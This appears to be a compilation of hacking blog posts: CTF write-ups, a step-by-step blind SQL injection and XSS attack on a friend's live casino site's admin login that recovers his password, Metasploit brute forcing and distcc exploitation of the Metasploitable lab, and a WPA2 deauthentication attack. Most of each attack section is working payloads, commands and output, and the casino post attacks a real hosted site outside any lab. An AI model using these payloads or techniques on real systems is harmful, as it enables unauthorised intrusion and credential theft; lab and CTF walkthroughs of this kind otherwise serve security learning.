joe/.local/share/gvfs-metadata/home
joe/.blueproximity/
joe/.blueproximity/standard.conf
joe/.gstreamer-0.10/
joe/.gstreamer-0.10/registry.i486.bin

[zoidberg@/dev/null:~/FORENSICS ] $

Oh wow, what do we have here. Looks like we have someone called joe’s home directory Now my instant thought was to grep for something similar to what we have seen in other flags, which was the string ‘Flag:’ so I performed a grep on the joe directory for ‘Flag’:

[zoidberg@/dev/null:~/SMP/CH4 ] $ grep -R 'Flag' joe/
Binary file joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Writer.dat matches
Binary file joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.GraphicFilter.dat matches
Binary file joe/.openoffice.org/3/user/registry/cache/org.openoffice.Office.Common.dat matches
Binary file joe/.openoffice.org/3/user/registry/cache/org.openoffice.TypeDetection.Filter.dat matches
Binary file joe/network_sniff.pcap matches
Binary file joe/.mozilla/firefox/ji5h5a20.default/Cache/47445552d01 matches
Binary file joe/.mozilla/firefox/ji5h5a20.default/Cache/_CACHE_003_ matches
Binary file joe/Downloads/hackerFiles/ntfs-hidden-data-analysis.pdf matches
grep: joe/.pulse/9588dbce1fca58830d10168a4aba6077-runtime: No such file or directory
joe/.gimp-2.6/pluginrc: (proc-arg 0 "at-top" "Flag for drawing numbers at top of film")
joe/.gimp-2.6/pluginrc: (proc-arg 0 "at-bottom" "Flag for drawing numbers at bottom of film")

[zoidberg@/dev/null:~/SMP/CH4 ] $

Which narrowed it down to the above files.. the only thing that stood out there was “Binary file joe/network_sniff.pcap matches”. I proceeded to open the packet up in wireshark. I then did a search on the string ‘File’ which turned up:

2290 532.914137 192.168.15.132 74.52.142.122 HTTP GET /flagg.jpg HTTP/1.1

I hit follow TCP stream on the above packet and got the following GET request and response:

GET /flagg.jpg HTTP/1.1

Host: www.penfest.ca

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 ( .NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

HTTP/1.1 200 OK

Date: Wed, 30 Jun 2010 01:05:16 GMT

Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

Last-Modified: Wed, 30 Jun 2010 01:04:26 GMT

ETag: "46cc02b-94a5-48a34ef62ba80"

Accept-Ranges: bytes

Content-Length: 38053

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: image/jpeg

......JFIF.....H.H.....4This is your Flag: Seeing is not always

*** I have cut it short as the rest is random characters ***

BINGO! There you have the flag:

This is your Flag: Seeing is not always

I thought this challenge was awesome, I guess thats because I have never done a forensic challenge before, it has definatley wet my appitite! Until the next time…

This is the first of many write-up’s to come from SMP CTF that happened over the weekend. Challenge 1, which was worth 200 points consisted of the following:

Set S = 1
Set P = 1
Set previous answer = 1

answer = S * P + previous answer + R
R = 39

After this => S + 1 and P + 1 ('answer' becomes 'previous answer') + 39
then repeat this till you have S = 11065.

The final key will be the value of 'answer' when S = 11065.

Example:
So if R = 15..

17 = 1 * 1 + 1 + 15
36 = 2 * 2 + 17 + 15
60 = 3 * 3 + 36 + 15


Submit the correct answer and you will receive a flag. Have fun ;D

Looking at the source page to this challenge we find a hidden hint:

!--VGhlIHZhbHVlcyBvZiBTIGFuZCBSIGNoYW5nZSBldmVyeSA1IG1pbnV0ZXMgb3Igc28gaGVoZSA7--

This looks awfully like base64, lets see…

[zoidberg@/dev/null:~ ] $ echo VGhlIHZhbHVlcyBvZiBTIGFuZCBSIGNoYW5nZSBldmVyeSA1IG1pbnV0ZXMgb3Igc28gaGVoZSA7 | base64 -d
The values of S and R change every 5 minutes or so hehe ;
[zoidberg@/dev/null:~ ] $

So moving on, this is a pretty straight forward math problem that we can easily translate into some perl / python code to work it out for us

Our team member Nex, was the person to complete this challenge, he came up with the following perl one liner:

perl -e 'my $pan=1; for (my $a=1;$a<=11065;$a++) { $ans=$a*$a+$pan+39; $pan=$ans; } print "$ans\n";'

Which pretty much translates to the math problem above, just broken down and put into code. When we run this piece of code, we get the following answer:

451639883701

Which when you submitted it, gave you the following:

Challenge ID: 36b1c546
Flag: WaSThAtFunORwhaT?!?xxxxxx

Yay so we completed that level. I wrote my own code in python for this challenge which consisted of the following:

>>> p_ans = 1
>>> val = 11065
>>> a = 1
>>> r = 39
>>> for i in range(a, val+1):
... answer = i * i + p_ans + r
... p_ans = answer
...
>>> print answer
451639883701
>>>

So that is how we beat Challenge 1. I won’t be writing a write-up for Challenge 2, I will briefly explain it now as it was such a simple challenge. So, this is what we got for challenge 2 (which was for 100 points):

Where's waldo?

ssh -l luser gordo.smpctf.com -p 2282 Password: smpctf

Help find waldo..

Upon logging into the server the users shell must of been set to /usr/bin/vi because we were presented with a vi terminal instead of a shell. This is quite a common trick and can be evaded simply by typing the following:

:set shell=/bin/sh
:sh

This will then drop you to a /bin/sh shell and you can proceed to find waldo any method you wish

We simply issued a few find / grep commands and found waldo hiding in a dot file under the /usr directory. If my memory serves me correctly it was as simple as this:

find /usr -name smp

This then gave us the following location:

/usr/lib/.flag/smp

Looking at the file ‘smp’ in the .flag directory we seemed to have found waldo

Challenge Key: cfc6adcc
Flag: HAHAHAHAHAHAHHAHAponies

Anyway, lookout for the next write-up which will be for Challenge 3 – the most craziest challenge there was I think

So this weekend was host to the “Spider Monkey Phenomenon” Capture The Flag (SMP CTF), held by redsand and magikh0e of Bl4ack Security. This was the first ever CTF that I have entered. I put together a team which composed of members from the Smash The Stack IRC network. We did really well and managed to get through to the finals at 4th place. The official score board looked like this after the final scores were counted:

1 Nibbles (5747.5)
2 Plaid Parliament of Pwning (5261)
3 n0psl3d (5231)
4 StS (4840)
5 lulzteam (4718.5)
6 Smoked Chicken (4365.75)
7 int3pids (3960.25)
8 0x28 Thieves (3785)

I am very happy with how the team worked and am looking forward to the finals. I will be writing up each challenge that we completed and hopefully the ones that were not released due to time and the couple we missed also due to time. So watch this space

So I was playing around with a friends website the other day and managed to break into the ‘admin’ area. I thought I should write a quick post to explain how I managed to do this.

First of all, I am not going to disclose the link to you all for obvious reasons so the link in the examples will actually be commented out. Anyway, a little about the website in question. It is a casino website that is written in mainly Flash with a little ASP.net relying on an MSSQL database. The main casino login was protected pretty well. I decided to fuzz for other directories and found the obvious one: /admin/. This was the login page to the backend of the casino, much more fun than the frontend login, at least that’s what I thought So, onto the hack…

When you visit:

http://www.xxx.co.uk/admin/login.aspx

You are presented with a login page that simply has a Username and Password form with a login and reset button. Right underneath the login/reset buttons was a string that said “username not found” or “password not found”, depending on which was correct or not. This enabled me to test the SQL injection and see if my queries were true or false. My friends name was Nigel Davies, I tried a combination of usernames that I thought he would use and stumbled across: “nigel_d”. How did I know that this was the correct username? Well I first of all started entering usernames and passwords, not to try and guess them but to see how the form reacted to different inputs, I got the following when I entered an incorrect username:

“username not found”

No surprises there then, however when I tried the “nigel_d” username and a random password I was presented with:

“wrong password”

Bingo! We now know the username “nigel_d” is valid

I then went on to test for SQL injections, my first point of call was the normal:

Username: ‘
Password: ‘

And I received the following page back:

Server Error in ‘/’ Application.
Unclosed quotation mark after the character string ”’.
Incorrect syntax near ”’.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ”’.
Incorrect syntax near ”’.

Source Error:

Line 29: con.Open()
Line 30: cmdSelect = New SqlCommand(“Select * From tb_CP_control where username= ‘” & username & “‘”, con)
Line 31: rd = cmdSelect.ExecuteReader()
Line 32: rd.Read()
Line 33: If rd.HasRows = True Then

Stack Trace:

[SqlException (0x80131904): Unclosed quotation mark after the character string '''.
Incorrect syntax near '''.]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +1950890
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +4846875
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +194
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +2392
System.Data.SqlClient.SqlDataReader.ConsumeMetaData() +33
System.Data.SqlClient.SqlDataReader.get_MetaData() +83
System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) +297
System.Data.SqlClient.SqlCommand.RunExecuteReaderTds(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, Boolean async) +954
System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method, DbAsyncResult result) +162
System.Data.SqlClient.SqlCommand.RunExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream, String method) +32
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior, String method) +141
System.Data.SqlClient.SqlCommand.ExecuteReader() +89
ASP.admin_login_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in e:\domains\c\xxx.co.uk\user\htdocs\admin\login.aspx:31
System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +256
System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +19
System.Web.UI.Page.Render(HtmlTextWriter writer) +29
System.Web.UI.Control.RenderControlInternal(HtmlTextWriter writer, ControlAdapter adapter) +27
System.Web.UI.Control.RenderControl(HtmlTextWriter writer, ControlAdapter adapter) +99
System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +25
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1266

Version Information: Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082

Woohoo, look at all that juicy information! What have we got here then, the first interesting part is:

Line 29: con.Open()
Line 30: cmdSelect = New SqlCommand(“Select * From tb_CP_control where username= ‘” & username & “‘”, con)
Line 31: rd = cmdSelect.ExecuteReader()
Line 32: rd.Read()
Line 33: If rd.HasRows = True Then

This shows us the actual SQL statement being executed:

Select * From tb_CP_control where username= ‘” & username & “‘

This is almost certainly vulnerable to SQL injection attacks The next interesting part is this:

Source File: e:\domains\c\xxx.co.uk\user\htdocs\admin\login.aspx Line: 31

Path disclosure. This tells me that it is a shared hosting environment because of the order of the path, domains, first letter of the domains, domain itself, so on and so forth. Also looking at the whois information for the domain shows it is registered and hosted with a fairly well known hosting company. That would be interesting if the scope of the test was the whole server itself.. however I am just playing with my friends website, so we will get back on track…

The problem we have here, is the Username field is vulnerable to SQL injection, however the Password field is not. So the only option I can think of, is to use the username field to bruteforce the password.. sounds good, let’s give it a try…

So let’s try bruteforcing the password then (I am using the FireFox plugin HackBar to aid me in this, so the SQL will be a copy and paste from what I enter in there):

user=’ or 1=1 and password like ‘a%’– &passwd=a

What happens here is we broaden the select statement to include all users with the (‘ or 1=1) meaning true, then we narrow the select statement so we only receive the ones with a password matching our pattern using the like statement. Like uses two different wild cards ‘_’ for single letters and ‘%’ for any strings (without the quotes).

So we are testing to see if any users passwords begin with ‘a’. We can now go through all characters a-zA-Z0-9 to find ones that match and that will make up our password. There is a way to speed things up here, such as using upper(password) and then passing ‘A%’ and &passwd=A. This then means we only have to go through characters A-Z0-9, which is a lot quicker. So moving on, after we enter the SQL statement above we get the following returned on the page:

“username not found”

Which means the letter a doesn’t match any users first character of their passwords. Let’s move onto the next character:

user=’ or 1=1 and upper(password) like ‘B%’– &passwd=B

Which gives us:

“username not found”

Still no characters matching moving on and leaving out a few to keep the post short:

user=’ or 1=1 and upper(password) like ‘N%’– &passwd=N

This gives us something slightly different:

“wrong password”

Now this means it matched the first character to a user’s password, however its incomplete so the wrong password message is displayed. Now we know that the first character of the password is an ‘n’. Onto the 2nd character of the password:

user=’ or 1=1 and upper(password) like ‘NA%’– &passwd=NA

Which in return gives us:

“username not found”

Now we just iterate through all the chracters until we get the “wrong password” string returned:

user=’ or 1=1 and upper(password) like ‘NI%’– &passwd=NI

Which gives us:

“wrong password”

Excellent, we now have the second character. We basically repeat this process until it logs us into the admin area. What happens is when you hit the end character of the password, the password is correct and when you execute the statement it logs you in, I managed to get into the admin area with the following statement:

user=’ or 1=1 and password like ‘niggle%’– &passwd=niggle

So it turns out his password was ‘niggle’ When I was doing this, I noticed something pretty bad about the way the message was displayed on the page (when you got either “wrong username” or “wrong password”) take a look at the URL that you get when it returns these strings:

http://www.xxx.co.uk/admin/index.asp?msg=wrong%20password

I smell, XSS… let’s give it a whirl

http://www.xxx.co.uk/admin/index.asp?msg=%22zoidberg%20pwnz%20j00%22

And low and behold, “zoidberg pwnz j00″ gets returned as the string on the page, haha. Returning to the SQL injection, here are a few more tricks to speed things up, if you wanna guess the password as a whole string you could use the following method:

user=fake_user’ OR (SELECT 1 From tb_CP_control where SUBSTRING(password,1,3) = ‘abc’ ) = 1 — &passwd=test

Which returns:

“username not found”

Because the password doesn’t match, however, if we try characters from the real password:

user=fake_user’ OR (SELECT 1 From tb_CP_control where SUBSTRING(password,1,3) = ‘nig’ ) = 1 — &passwd=test

We get:

“wrong password”

Excellent, so we can test it with this:

user=fake_user’ OR (SELECT 1 From tb_CP_control where SUBSTRING(password,1,5) = ‘niggl’ ) = 1 — &passwd=test

“wrong password”

user=fake_user’ OR (SELECT 1 From tb_CP_control where SUBSTRING(password,1,6) = ‘niggle’ ) = 1 — &passwd=test

“wrong password”

user=fake_user’ OR (SELECT 1 From tb_CP_control where SUBSTRING(password,1,6) = ‘nigglea’ ) = 1 — &passwd=test

“username not found”

So as you can see that definatley confirms that ‘niggle’ is the password. Also a quick way to check the password length before doing the bruteforce so you know how many characters there are is:

user=fake_user’ OR (SELECT LEN(password) From tb_CP_control ) = 1 –&passwd=test

“username not found”

user=fake_user’ OR (SELECT LEN(password) From tb_CP_control ) = 2 –&passwd=test

“username not found”

user=fake_user’ OR (SELECT LEN(password) From tb_CP_control ) = 5 –&passwd=test

“username not found”

user=fake_user’ OR (SELECT LEN(password) From tb_CP_control ) = 6 –&passwd=test

“wrong password”

user=fake_user’ OR (SELECT LEN(password) From tb_CP_control ) = 7 –&passwd=test

“username not found”

So as you can see from the above statements 5 is false, 6 is true and 7 is false, meaning the password length is 6 characters long, which ties in with the password being ‘niggle’.

I had a lot of fun playing around with this site, hope it helps someone out. Until the next time…

I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable distribution I mentioned in my previous post. This is very simple and shouldn’t take long to demonstrate, so here goes:

root@bt:/pentest/exploits/framework3# ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...

Auxiliary
=========

Name Rank Description
---- ---- -----------
admin/mysql/mysql_enum normal MySQL Enumeration Module
admin/mysql/mysql_sql normal MySQL SQL Generic Query
admin/tikiwiki/tikidblib normal TikiWiki information disclosure
scanner/mysql/mysql_login normal MySQL Login Utility
scanner/mysql/mysql_version normal MySQL Server Version Enumeration

Exploits
========

Name Rank Description
---- ---- -----------
linux/mysql/mysql_yassl_getname good MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello good MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello average MySQL yaSSL SSL Hello Message Buffer Overflow

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /root/password.txt no File containing passwords, one per line
RHOSTS 10.113.8.102 yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE /root/users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > exploit

[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Bingo! We found the root password which is simply ‘root’ Now let’s double check this:

root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)

mysql>

Now we have complete control over their database, yay!

I have been playing around with Metasploitable. This is a test system produced by the Metasploit team that is very vulnerable. One of the services it is running is distcc. Today I will show you how to own it using Metasploit…

First of all we shall start with a port scan of the system:

root@bt:~# nmap -sV -sS -p1-65535 10.113.8.102

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-03 11:04 BST
Nmap scan report for ml-dkelly.messagelabs.com (10.113.8.102)
Host is up (0.0034s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:9F:54:C9 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds
root@bt:~#

We are most interested in the following line:

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Right, so let’s fire up Metasploit then:

root@bt:/pentest/exploits/framework3# ./msfconsole

____________

------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search distcc
[*] Searching loaded modules for pattern 'distcc'...

Exploits
========

Name Rank Description
---- ---- -----------
unix/misc/distcc_exec excellent DistCC Daemon Command Execution

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > set RHOST 10.113.8.102
RHOST => 10.113.8.102
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

Name Rank Description
---- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.113.8.102 yes The target address
RPORT 3632 yes The target port

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.113.8.102 no The target address

Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (10.113.10.116:55064 -> 10.113.8.102:4444) at Sat Jul 03 11:54:29 +0100 2010

whoami; uname -ar
daemon
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Excellent, so we managed to get a bind shell working and now have command execution on the target system.. but what else can we do? Well we should be able to use their ssh key and login as root. First we must download: debian_ssh_rsa_2048_x86.tar.bz2. You can quickly pop that into google and find a place to download such as here. Once you have downloaded it, un-compress it, then perform the following steps:

* SNIP *
rsa/2048/22395760ea6265919ef5db8d26dda56c-17578
rsa/2048/e311fc52da0d062cd6e9a507a7470db8-15835.pub
rsa/2048/ae88b6e25a832541ac60978e90fb40fe-28014
rsa/2048/759ee1c853d2fcc07a13e6867ed75a35-26843
rsa/2048/22817b9fcfca9c043d6d48dac528b0a6-3298
rsa/2048/cd84c0196af31046b45037f39208c9c1-11710
rsa/2048/9634a42c34d72e776593a9f1ddd38085-2633
rsa/2048/1668b5d4171480a6359c0966ded47550-15730
rsa/2048/b8a7774ef9e5b9b2b73a685e509b899b-2131
root@bt:~/rsa/2048# grep -lir AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

57c3115d77c56390332dc5c49978627a-5429.pub
root@bt:~/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.113.8.102
Last login: Sat Jul 3 07:01:04 2010 from 10.113.10.116
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

You have mail.
root@metasploitable:~#

So we managed to get a shell on the vulnerable system

I decided to document how to break into a WPA2 enabled wireless network, so I setup my LinkSys WRT54G wireless router over the weekend, here is how I broke into it:

root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode disabled)

Start the wireless card in monitor mode:

root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)

Now we want to run airodump-ng and filter out all the other access points and clients so that we only capture the handshake for our target access point (HackMe):

root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0C:41:9D:C7:5C 0 100 316 38 0 6 54 WPA2 CCMP PSK HackMe]

BSSID STATION PWR Rate Lost Packets Probes

00:0C:41:9D:C7:5C 00:21:5C:90:2D:89 0 1 - 1 126 456 HackMe

root@bt:~#

Whilst we leave airodump-ng capturing packets and waiting for the WPA Handshake, we can speed things up a little using aireplay-ng. We can force one of the associated clients to de-auth and it will automatically re-authenticate itself with the access point allowing us to capture the WPA Handshake:

root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
